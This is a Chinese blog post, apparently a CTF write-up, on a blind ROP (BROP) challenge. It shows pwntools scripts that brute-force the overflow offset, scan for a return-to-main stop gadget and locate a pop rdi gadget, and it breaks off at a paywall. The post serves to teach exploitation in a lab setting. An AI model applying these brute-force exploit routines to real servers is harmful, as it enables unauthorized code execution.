BROP(黑盒pwn)

最新推荐文章于 2023-07-29 09:45:00 发布
最新推荐文章于 2023-07-29 09:45:00 发布
阅读量1k 收藏 2
点赞数 1
分类专栏: pwn 文章标签: pwn 黑盒测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/F_Day_/article/details/120868821
版权

BROP(黑盒pwn)

这题很有意思,通过黑盒的方法来进行溢出攻击,同时这里也用到了__libc_csu_init函数利用的新姿势
题目是:brop
参考链接:https://wiki.x10sec.org/pwn/linux/user-mode/stackoverflow/x86/medium-rop/#_8

做这道题,不要ida,否则没有意义了

思路

对于黑盒,这道题的目的也很明确,就一个输入就结束了,明显的需要溢出
那么第一步就是通过不断测试字符长度来判断溢出点
这个实现还是很简单的

def overflow(file):
    i = 1
    while 1:
        try:
            p = process(file)
            p.recvline()
            p.sendline(b'a' * i)
            print(1)
            s = p.recvline()
            p.close()
            print(b's:' + s)
            if b'No' not in s:
                return i - 1
            else:
                i += 1
        except EOFError:
            print(2)
            p.close()
            return i - 1

得到的值:72
之后的操作就需要寻找代码中的gadgets了 ,但由于这题本身的是没有源文件的,那么获取gadgets就是问题了,这玩意不好描述,还是看实际例子

比如,首先我们需要得到一个地址,这个地址去覆盖掉栈溢出后的那个返回地址,然后能够返回到main函数重新执行
这个地址不一定是main函数的地址,也可能是在main函数前执行初始化操作的代码部分,总之能够返回到main就行

具体实现过程就是,从0x400000(64位程序代码段基地址)开始,不断去遍历它,直到能够返回到main为止

addr = 0x400000 ~ 0x410000 #我们需要的这个地址大致在这个区间
payload = 'a' * 72 + p64(addr)
# 不断尝试这个payload

那么具体实现就是

def retmain_gadgets(length, file):
    addr = 0x4005c4
    f = open('./stop_gadgets', 'w')
    while addr < 0x401000:
        try:
            payload = b'a' * length
            payload += p64(addr)
            p = process(file)
            print("addr: " + hex(addr))
            p.recvuntil(b'password?\n')
            p.sendline(payload)
            p.recvuntil(b'password?\n')
            p.close()
            print("SUCCESS: " + hex(addr))
            return addr
        except Exception:
            addr += 1
            print("ERROR!")
            p.close()

有了这一步,对黑盒寻找gadgets就有了点感觉了,按照传统方式,我们这里不可能知道这个程序有哪些函数,因此无法直接执行system("/bin/sh")
还是需要获取libc基地址来进行
那么下一步就是通过write或者puts来打印出他们的地址
因此就需要知道几样东西

  • 有没有pop rdi;ret,否则没办法传参
  • put函数地址是多少,否则没法打印
  • puts函数的got表地址,否则没法打印puts函数地址

寻找pop rdi;ret

__libc_csu_init这个函数,应该还有印象,我在ret2csu这篇文章利用这个函数来实现整个过程
但这个函数还有另外的用法,就是这里面存在pop rdi; ret
表面上是不存在这个的,那是因为汇编的起始地址问题,看下面这个
在这里插入图片描述
将偏移+9,得到不同的汇编片段,并且是我们需要的

因此程序可能隐含存在pop rdi;ret的片段
可以构造payload = ‘a’ * 72 + p64(addr) + p64(0) + p64(retmain)
如果程序正常返回到main函数,那么我们就成功的得到pop ret结构的片段

那么问题来了,这样无法确定这个pop的对象是不是rdi
我有两个思路

  • 先寻找__libc_csu_init函数中的六个pop的地址,然后加上9个偏移就是了,当然也可以用之前ret2csu的思路来做
  • 或者,更暴力一点,像这样payload = ‘a’ * 72 + p64(addr) + p64(0x400000) + p64(put),这需要对 addr和put两个地址都进行遍历,直到能执行puts函数并输出带有ELF的字符,但这个效率太低太低

所以用第一种官方的方法吧

这个方法有个小问题,有特殊情况需要考虑
只pop一次
在plt 处不会崩
在_start 处不会崩,相当于程序重新执行。

因此需要将这个考虑在内
那么具体实现如下

def brop_gadgets(length, ret2main):
    
    addr = 0x400
最低0.47元/天 解锁文章
F_D。
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BROP入门之 KCTF 2022 废土末世
weixin_46483787的博客
05-25 1187
定义 来自CTF wiki: BROP 是没有对应应用程序的源代码或者二进制文件下,对程序进行攻击,劫持程序的执行流 攻击条件 源程序必须存在溢出漏洞,以便于攻击者可以控制程序流程。 服务器端的进程在崩溃之后会重新启动,并且重新启动的进程的地址与先前的地址一样(这也就是说即使程序有 ASLR 保护,但是其只是在程序最初启动的时候有效果)。目前 nginx, MySQL, Apache, OpenSSH 等服务器应用都是符合这种特性的 基本思路 暴力枚举获取溢出长度,逐字符比较泄露返回地址,获取gad
Security-Courseware:HIT的计算机系统安全课程的课件
03-11
(Baggy,BROP) (OKWS) (辣椒) (Apple iOS,Pegasus) (,包含) (BEAST,CRIME,POODLE,3HS ...) (TCP劫持) (空闲扫描,LSRR) (Shrew,IP跟踪) (基于Bro,基于ML的异常检测) (摘自D. Clark...
PWN学习总结(四)—— BROP
qq_41988448的博客
12-11 2534
pwn学习总结(七) —— BROP描述攻击条件攻击思路例题判断溢出长度寻找 stop gadgets寻找 brop gadgets寻找 puts 函数的 plt 地址寻找 puts 函数的 got 地址并 dump plt 表getshell 描述 BROP(Blind ROP)于 2014 年由 Standford 的 Andrea Bittau 提出,其相关研究成果发表在 Oakland...
pwn学习-中级ROP-BROP
WocW的博客
03-06 870
实例复现 先与程序交互 这里直接用本地服务器模拟远程的,但实际上不对原文件进行逆向分析。 其中asdasd为我任意输入的password,可以看出程序的基本交互。这里我们开始 爆破出buffer的长度 exp from pwn import * from LibcSearcher import LibcSearcher def getBufferLength(): i...
使用阿里云服务器搭建一道BROPpwn
至臻求学,胸怀云月
02-26 1047
搭建题目环境 题目:HCTF2016 brop C代码如下: #include <stdio.h> #include <unistd.h> #include <string.h> int i; int check(); int main(void) { setbuf(stdin, NULL); setbuf(stdout, NULL); ...
溢出之BROP
Sakura给爷pwn全场
01-01 217
Blind Return Oriented Programming (BROP) Attack - 攻击原理: https://blog.csdn.net/omnispace/article/details/51006149 BROP: https://www.jianshu.com/p/2bd323e7e97f
PWN】初见BROP
最新发布
2301_77342543的博客
07-29 221
第一次BROP,它让我觉得pwn,或者说网安很妙,也很折磨在遇到它之前,之前接触的题目都是简单的溢出,感觉没有啥有趣的,很简单,找gadget溢出就可以,一切都看得见可遇到它之后,这是真的折磨,一切都是未知但是因为未知,所以产生了美感,或许是因为摸不着,所以才有一种神秘的魔力一点点吸引我学pwnBROP(Blind ROP),于 2014 年由 Standford 的 Andrea Bittau 提出,这种攻击方式是实现在无源代码和二进程程序的情况下对运行中的程序进行攻击。
溢出基础知识、溢出保护机制、溢出利用方法.docx
01-10
3. **Blind Return-Oriented Programming (BROP)**:在没有目标二进制文件的情况下,通过已知的溢出漏洞和程序行为进行攻击。 每个方法都有其特定的使用场景和挑战,例如,SROP和BROP在某些情况下可能更为有效,...
一键DOC清除操作记录
04-13
591 A1BROP70 SIFLA1BROP0700 BF ROP Lib V7.0 v7.0 1151 A1BROP71 SIFLA1BROP0701 BF ROP Lib V7.1 v7.1 751 A1BUN070 SIFLA1BUN00700 BATCH 10 UNITs v7.0 752 A1BUN270 SIFLA1BUN20700 BATCH 20 UNITs...
中级ROP之BROP
至臻求学,胸怀云月
02-25 3088
Blind ROP 基本介绍 于2014年提出,论文题目名为Hacking Blind,BROP是指在没有对应应用程序的源代码或者二进制文件的情况下,对程序进行攻击,劫持程序的执行流。 攻击条件 源程序必须存在溢出漏洞,以便于攻击者可以控制程序流程。 服务器端的进程在崩溃之后会重新启动,并且重新启动的进程的地址与先前的地址一样,目前nginx,mysql,apache,openssh等服务器应...
Blind Return Oriented Programming (BROP) Attack - 攻击原理
omnispace的博客
03-29 4632
0x00 写在前面 第一次在WooYun发文章,不知道是否符合众客官口味,望轻拍。 这篇文章翻译至我的这篇博客,主要介绍了一种叫做BROP的攻击,该文章主要介绍原理部分,对该攻击的重现可以参看我的另外一篇博客。 BROP攻击基于一篇发表在Oakland 2014的论文Hacking Blind,作者是来自Standford的Andrea Bittau,以下是相关paper和slide的链
BROP_轮子
09-16 623
总体思想:爆破buf长度-----爆破canary-----find stop_gadgets-----find brop_gadget-----find puts()/write()-----泄露函数的got地址得到libc-----编写ROP 将 socket 输出重定向到输入输出 寻找 “/bin/sh” 的地址。一般来说,最好是找到一块可写的内存,利用 write 函数将...
ciscn_final_7(黑盒测试)
seaaseesa的博客
07-25 368
ciscn_final_7(黑盒测试) 首先检查一下程序的保护机制 然后,我们用IDA分析一下 程序比较复杂 比较难逆向,其大致原理是fork了子进程做为一个调试进程,然后主进程里通过int 3中断通知调试器设置相应的寄存器,从而执行到其他地方。 由于整个程序主逻辑全部使用中断来实现,比较难逆向,因此我们直接黑盒测试了。 首先通过枚举choice的选项,得到了一下选项 #110 add #120 edit #238 del #386 exit 然后就进行测试,发现d
BROP攻击实例
u010796610的专栏
02-28 1393
转载于:http://ytliu.info/blog/2014/06/01/blind-return-oriented-programming-brop-attack-er/ Following the 1st session, which talked about the principle of BROP attack, this page will discuss about ho
MySQL中的删除:drop,delete,truncate的区别和联系
热门推荐
m0_49622667的博客
06-02 1万+
drop是DDL(数据定义语言),用于整张表的删除,删除的时候不仅删除了表中的数据,还删除了表结构。(也就是使用drop删除表后,数据库中便查询不到该表) 语法:drop table 表名; 注:drop命令后不可使用where等命令。delete是DML(数据操作语言),用于对表中数据的删除,不会删除表结构,也就是说即使你使用delete from 表名;将表中所有数据都删除了,该表依然存在。 delete的删除原理:在InnoDB数据库引擎下,将要删除的数据添加一个删除标记,该表的实际大小不会产生变化
CTF学习日记----攻防世界pwn高手区welpwn
派大星的博客
11-16 515
CTF学习日记----攻防世界pwn高手区welpwn 前言 本人CTF菜鸡一枚,今天也是第一次创作博客,今天做了一个ROP链的题目,特地记录一下,如有错误,还请各位大佬批评指正,侵删。 题目 题目没有任何提示,附件扔进kali看看 64位程序,开启NX保护。对于NX保护,我的理解是NX(DEP)的基本原理是将数据所在内存页标识为不可执行,当程序溢出成功转入shellcode时,程序会尝试在数据页面上执行指令,这时就违反了NX,CPU就不干了,从而不能执行恶意指令。但是我们可以通过其他命令绕过NX保护,
pwn学习之路
飞花的世界
04-15 2951
最近也开始学习pwn了。。。网站平台是http://pwnable.kr/play.php网址是http://pwnable.kr/play.php第三题,代码如下#include &lt;stdio.h&gt; #include &lt;string.h&gt; #include &lt;stdlib.h&gt; void func(int key){ char overflowme[32];...
上一期文章说的关于PWN入门常见的问题
mumuzi的博客
07-29 3490
我要是有地方说错了一定要指出来啊嘤嘤嘤 虽然是从我自己的角度来理解的,但是估计应该大概还是有帮助的(吧)。 自己想的和群友提出来,涉及的问题有: 师傅,怎么入门pwn啊 那个canary保护机制,为什么说是覆盖低字节来得到canary,没理解到。反正就只知道是大概这种方式来得到canary plt和got是什么关系啊,为什么写payload的时候有时候在前,有时候在后,有时候又重复出现这样的,没搞懂 为什么要用puts而不用printf(他意思是ret2libc的题) 格式化字符串里的$是啥意义啊 1.
【译】Writing a Simple Linux Kernel Module
omnispace的博客
09-05 359
掌握 Golden Ring-0 Linux为应用程序提供了强大而广泛的API,但有时这还不够。 与一块硬件交互或执行需要访问系统中特权信息的操作需要内核模块。 Linux内核模块是一段编译的二进制代码,直接插入到Linux内核中,运行在x86-64处理器中最低且受保护程度最低的环0。 此处的代码完全未经检查,但以令人难以置信的速度运行,并且可以访问系统中的所有内容。 不仅仅是凡人 编写L...
浅谈溢出漏洞利用技术——学习笔记
楠木种子的三亩地
01-27 1351
文章目录基础知识寄存器:重要寄存器:一种先进先出的数据结构函数调用溢出的保护机制上的数据被当做指令来执行让攻击者难以找到shellcode地址检测Stack Overflow(溢出)溢出的利用方法现代溢出利用技术基础:ROPCTF中ROP技术的常见套路利用signal机制的ROP技术(SROP)没有binary怎么办(BROPBROP的目标BROP的条件劫持指针(Stack Piv...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值